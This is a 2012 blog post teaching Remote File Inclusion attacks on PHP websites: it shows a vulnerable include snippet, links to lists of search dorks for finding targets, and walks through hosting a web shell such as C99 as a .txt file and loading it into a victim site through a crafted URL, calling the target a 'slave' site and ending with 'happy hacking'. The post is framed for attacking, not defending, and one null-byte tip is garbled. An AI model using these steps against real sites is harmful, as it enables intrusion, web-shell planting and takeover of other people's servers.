About Me

Friday 13 April 2012

RFI Part-2

Today I will be teaching you RFI (Remote File Inclusion).

What is RFI?
RFI is a very uncommon vulnerability due to excessive patches and updates on websites. You will be very lucky to find a vulnerable site. Nevertheless, there are still vulnerable websites, many users of HackForums have dorks for searching for RFI vulnerable websites, as well as having lists of RFI vulnerable websites. RFI, also known as Remote File Inclusion is exactly what it's name is. You include a file onto the website remotely.

What makes a page vulnerable?
A PHP include script looks like this.

Code:
<?php
include($_GET['p']
?>

Since the code uses 'p' the syntax would be:

Code:
http://victimsite.com/index.php?[b]p[/b]=URL_TO_SHELL.txt?

If the script looks like this:

Code:
<?php
include($_GET['lulz']);
?>

The syntax would then be:

Code:
http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?

What can I accomplish with RFI?
You can include your PHP shells onto the website (GNYShell, C99, etc).
You can include just about any file onto the website.

How can I search for RFI vulnerable sites?
Using dorks, exploit scanners, etc.

Here is a list of RFI dorks:
http://paste.ubuntu.com/928080/
http://tinypaste.com/25b744e3 - pwd nullvoid dont include pwd

We've got our target, how do we exploit this vulnerability?
Testing the vulnerability is basically exploiting the vulnerability. So we will be testing as well as finishing up.
What you have to do is go to your vulnerable website. In this case I will be making a website up for demonstration.

Code:
http://victimsite.com/index.php?p=interview.php

As you can see above there is a file attached to the index.php file. In this case it is "interview.php". Most of the time there will have to be a file at the end of the URL, just like this one. Since we're including a file there has to be something to replace it with.

Tweaking and exploiting.
So now we want to tweak this to our advantage. This is rather simple.

What you will need.
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.

Code:
http://yoursite.com/shell.txt

Including our shell to our slave's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" and include our own file.
Our new link should look like this.

Code:
http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?

The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it.

Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?".

I HOPE THIS WILL HELP EVERYONE, HAPPY HACKING!!

0 comments:

Post a Comment